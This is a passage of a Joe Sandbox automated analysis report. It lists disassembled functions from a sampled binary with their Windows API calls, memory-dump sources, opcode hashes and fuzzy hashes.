                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                          • String ID:
                                                          • API String ID: 615853336-0
                                                          • Opcode ID: 5d2849343338a5a55ff144c3b38db7c4019dc5eba39b34ddb67998c5d7091060
                                                          • Instruction ID: 5d97a3dc432019d8ffe37832b99d68e59ad122b130830de5e5a76b0d95965ddd
                                                          • Opcode Fuzzy Hash: 5d2849343338a5a55ff144c3b38db7c4019dc5eba39b34ddb67998c5d7091060
                                                          • Instruction Fuzzy Hash: A1F0FF7291010AAADF14EB66DC01BEE7AFCEF22718F240818E420B2E90CF71DB088650
                                                          Function 6CF66C60 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CF66C73
                                                          • SafeArrayAccessData.OLEAUT32(00000000,6CF66C3C), ref: 6CF66C87
                                                          • _memmove.LIBCMT ref: 6CF66C9A
                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CF66CA3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Data$AccessCreateUnaccessVector_memmove
                                                          • String ID:
                                                          • API String ID: 3147195435-0
                                                          • Opcode ID: 350e8fe741dbd40e85f6b1de97dd46c5518fe7c652dc825a75cf10352b3aa199
                                                          • Instruction ID: 6ee0191e96c430b51ed5c0ce1d559ee74b2e1baba666e9dcd8e54bef0b497fa0
                                                          • Opcode Fuzzy Hash: 350e8fe741dbd40e85f6b1de97dd46c5518fe7c652dc825a75cf10352b3aa199
                                                          • Instruction Fuzzy Hash: 70F05E75315214BBEB116F62DC89F973FACEFC6765F018015FA188A240E770E5009BB1
                                                          Function 6CF81FD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • std::exception::exception.LIBCMT ref: 6CF82206
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF82221
                                                            • Part of subcall function 6CF86480: __CxxThrowException@8.LIBCMT ref: 6CF86518
                                                            • Part of subcall function 6CF86480: __CxxThrowException@8.LIBCMT ref: 6CF86558
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$_mallocstd::exception::exception
                                                          • String ID: ILProtector
                                                          • API String ID: 84431791-1153028812
                                                          • Opcode ID: 73846493c651be45d23166f2abf96f5ffec647ca683028b0fc3cfdce143ebe5f
                                                          • Instruction ID: ee350c3b092d8833a0796f72249ce5d8274e556c97816dae35abbef2b7ea24f1
                                                          • Opcode Fuzzy Hash: 73846493c651be45d23166f2abf96f5ffec647ca683028b0fc3cfdce143ebe5f
                                                          • Instruction Fuzzy Hash: AA7137B5E05258DFCB54CFA8C884BDEBBB4EB49304F1481AAE419A7740DB316A48CF91
                                                          Function 6CF69110 Relevance: 5.1, APIs: 4, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CF6913B
                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CF6915C
                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6CF69170
                                                          • LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CF69191
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave
                                                          • String ID:
                                                          • API String ID: 3168844106-0
                                                          • Opcode ID: 50f9c06af58a08e3e1683c9253c027843d85c0f61f95462ddd440b01f4eddcc1
                                                          • Instruction ID: ac571477eee28781b539e40dc1568334153ecaacaba0b0ae80c5a4e7b7efd809
                                                          • Opcode Fuzzy Hash: 50f9c06af58a08e3e1683c9253c027843d85c0f61f95462ddd440b01f4eddcc1
                                                          • Instruction Fuzzy Hash: 534142769002099FCB04DFA5D9848EEBBB4FF49314B61855ED816ABB10D730EA05CFE1
                                                          Function 6CF68E20 Relevance: 4.7, APIs: 3, Instructions: 162COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32 ref: 6CF68E89
                                                          • LeaveCriticalSection.KERNEL32(?,00000000), ref: 6CF68EAD
                                                          • _memset.LIBCMT ref: 6CF68ED2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave_memset
                                                          • String ID:
                                                          • API String ID: 3751686142-0
                                                          • Opcode ID: cfced07b12dc06a6d7c7f5b9e98e25339145c089d581f3ec23518ce2e0f41b72
                                                          • Instruction ID: 821ca254018f5d6b52047f60d01b0346578eff01516f0c8d5f036bb43804ddde
                                                          • Opcode Fuzzy Hash: cfced07b12dc06a6d7c7f5b9e98e25339145c089d581f3ec23518ce2e0f41b72
                                                          • Instruction Fuzzy Hash: 77515EB4A01205AFCB44CF59C490F9AB7B6FF4A304F10859DE91A9BB81DB31EE55CB90
                                                          Function 6CF6D920 Relevance: 4.6, APIs: 3, Instructions: 81COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CF6D949
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6CF6D96C
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF6D9CF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$CreateDestroyElementVector
                                                          • String ID:
                                                          • API String ID: 3149346722-0
                                                          • Opcode ID: 0811e4996f3f756db645bf30e5ad003bc3f17eff5293d874a7d302188790bba0
                                                          • Instruction ID: a467bd8027907d8a3b3f1a3a70165ef968cb8424ba49c08d0244b160e9f5e863
                                                          • Opcode Fuzzy Hash: 0811e4996f3f756db645bf30e5ad003bc3f17eff5293d874a7d302188790bba0
                                                          • Instruction Fuzzy Hash: D821B031701204AFEB01CF66C884FAB77B8EF8A744F204098E945DB744D771E801CBA1
                                                          Function 6CF7DB10 Relevance: 4.6, APIs: 3, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF7DB2D
                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF7DB45
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF7DBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$CreateDestroyElementVector
                                                          • String ID:
                                                          • API String ID: 3149346722-0
                                                          • Opcode ID: 8258c5dd098949c1aadf30b11d8f546c5ac7c299954cc15a56c786b5fbe2be19
                                                          • Instruction ID: 581512fe712faf63e907c0d836a2184f484ec44d123bd4d4edd63e97d5eebb50
                                                          • Opcode Fuzzy Hash: 8258c5dd098949c1aadf30b11d8f546c5ac7c299954cc15a56c786b5fbe2be19
                                                          • Instruction Fuzzy Hash: CF11BC75746205AFD700DF69C888F9ABBB8FF5A314F45829AE908DB341D730A801CBA0
                                                          Function 03399990 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $bq$4bq$dbq
                                                          • API String ID: 0-618732975
                                                          • Opcode ID: 000ef08197f87b7ecea7a8b426890ecfb6746a72b87e85de793e4677fe0bf4e9
                                                          • Instruction ID: a3edb61af7be3faa8cb7d9688d52afd4a156968ba2eee4224e572cd6fd21a1e8
                                                          • Opcode Fuzzy Hash: 000ef08197f87b7ecea7a8b426890ecfb6746a72b87e85de793e4677fe0bf4e9
                                                          • Instruction Fuzzy Hash: DB71E774E00208CFDB54DFA9C994AADBBB6FF89300F20846AD409AB365DB359C45CF40
                                                          Function 03399947 Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $bq$4bq$dbq
                                                          • API String ID: 0-618732975
                                                          • Opcode ID: bd73d3aaf850c9536d86c6dcb9bfb1cb0d82905ce37968b5a03ae9be2b33c873
                                                          • Instruction ID: 01fc6807ffa5640a973e1e546f1572b08b3d8d1ba1d0fa6232a3a6b64eaf436d
                                                          • Opcode Fuzzy Hash: bd73d3aaf850c9536d86c6dcb9bfb1cb0d82905ce37968b5a03ae9be2b33c873
                                                          • Instruction Fuzzy Hash: 1D71D574E00208CFDB58DFA9C994A9DBBB6FF89304F20856AD409AB365DB35AC45CF41
                                                          Function 033999A0 Relevance: 3.9, Strings: 3, Instructions: 162COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $bq$4bq$dbq
                                                          • API String ID: 0-618732975
                                                          • Opcode ID: 570bedf9052e1619ad6278e1db9899c3e09b164f478c8d40d1a8088c59cbc011
                                                          • Instruction ID: f5efea2f1f641bc1e0fa1dfdafda3cf223c18230e46c8a9624394eb55ce61b28
                                                          • Opcode Fuzzy Hash: 570bedf9052e1619ad6278e1db9899c3e09b164f478c8d40d1a8088c59cbc011
                                                          • Instruction Fuzzy Hash: 9171E474E00208CFDB54DFA9C994A9DBBB6FF88310F20856AE409AB365DB35AC45CF41
                                                          Function 6CF83EB0 Relevance: 3.2, APIs: 2, Instructions: 242COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • std::exception::exception.LIBCMT ref: 6CF84042
                                                            • Part of subcall function 6CFB9533: std::exception::_Copy_str.LIBCMT ref: 6CFB954E
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF84059
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C04
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C1E
                                                            • Part of subcall function 6CFB9BB5: __CxxThrowException@8.LIBCMT ref: 6CFB9C2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
                                                          • String ID:
                                                          • API String ID: 2813683038-0
                                                          • Opcode ID: 62c4eae0b681234b687c5cf17218032b6702a6b457bdbbcabab35dc516bf0a55
                                                          • Instruction ID: e9502d4b3d7c5a091e7632e3a33955cdd5203309e59067a85b46185cba667716
                                                          • Opcode Fuzzy Hash: 62c4eae0b681234b687c5cf17218032b6702a6b457bdbbcabab35dc516bf0a55
                                                          • Instruction Fuzzy Hash: 6291D1B1804700AFC700CF5AC841B9AFBF8FF94344F15895AE5159BBA0E7B1DA08CB92
                                                          Function 6CF6BDF7 Relevance: 3.2, APIs: 2, Instructions: 200COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF6BE2D
                                                          • IsBadReadPtr.KERNEL32(00000000,00000008,?,?,?), ref: 6CF6BE6D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroyReadSafe
                                                          • String ID:
                                                          • API String ID: 616443815-0
                                                          • Opcode ID: 9b38932098500146b51ab7e15553cdf5bcdf102f11dccfa5d51f0aff9e801b87
                                                          • Instruction ID: 1dc8dcb72278f25c077d9b3b7e347208e43faa988044d31e975531baa6a138b2
                                                          • Opcode Fuzzy Hash: 9b38932098500146b51ab7e15553cdf5bcdf102f11dccfa5d51f0aff9e801b87
                                                          • Instruction Fuzzy Hash: 607135B0D046965EDB21CFB78840699FBB1AF06228F188B5CF9E497EE2C731D442DB50
                                                          Function 6CF662C0 Relevance: 3.1, APIs: 2, Instructions: 149COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • std::exception::exception.LIBCMT ref: 6CF66466
                                                            • Part of subcall function 6CFB9533: std::exception::_Copy_str.LIBCMT ref: 6CFB954E
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF6647D
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                          • String ID:
                                                          • API String ID: 2299493649-0
                                                          • Opcode ID: 459c936b836fa4898b3a34ba86418584d92f5fcd0b36d0b122afd07c4d30bad0
                                                          • Instruction ID: 37564177042caeeec6bd9d18a67d4117cedb99a8b46fceabda487dc156d69d74
                                                          • Opcode Fuzzy Hash: 459c936b836fa4898b3a34ba86418584d92f5fcd0b36d0b122afd07c4d30bad0
                                                          • Instruction Fuzzy Hash: E9518EB2808340AFD700CF56C981A8ABBF4FB85704F54492EF59997B90D771DA48CB93
                                                          Function 6CF7D2E0 Relevance: 3.1, APIs: 2, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • std::exception::exception.LIBCMT ref: 6CF7D3E8
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF7D3FF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 4063778783-0
                                                          • Opcode ID: f023e85b82bb94c06d04290bc9edf157faea5ea1ef37f7b55de70116601c3f7c
                                                          • Instruction ID: 18cd8c43228b849255689ad49555b6a2473c2026d806f9c7f39c5ff7c7260d96
                                                          • Opcode Fuzzy Hash: f023e85b82bb94c06d04290bc9edf157faea5ea1ef37f7b55de70116601c3f7c
                                                          • Instruction Fuzzy Hash: C9316FB15147059FC704CF29D48099ABBF4FF89714F608A2EF4558BB50E731EA0ACBA2
                                                          Function 6CF68400 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • std::exception::exception.LIBCMT ref: 6CF68449
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF6845E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 4063778783-0
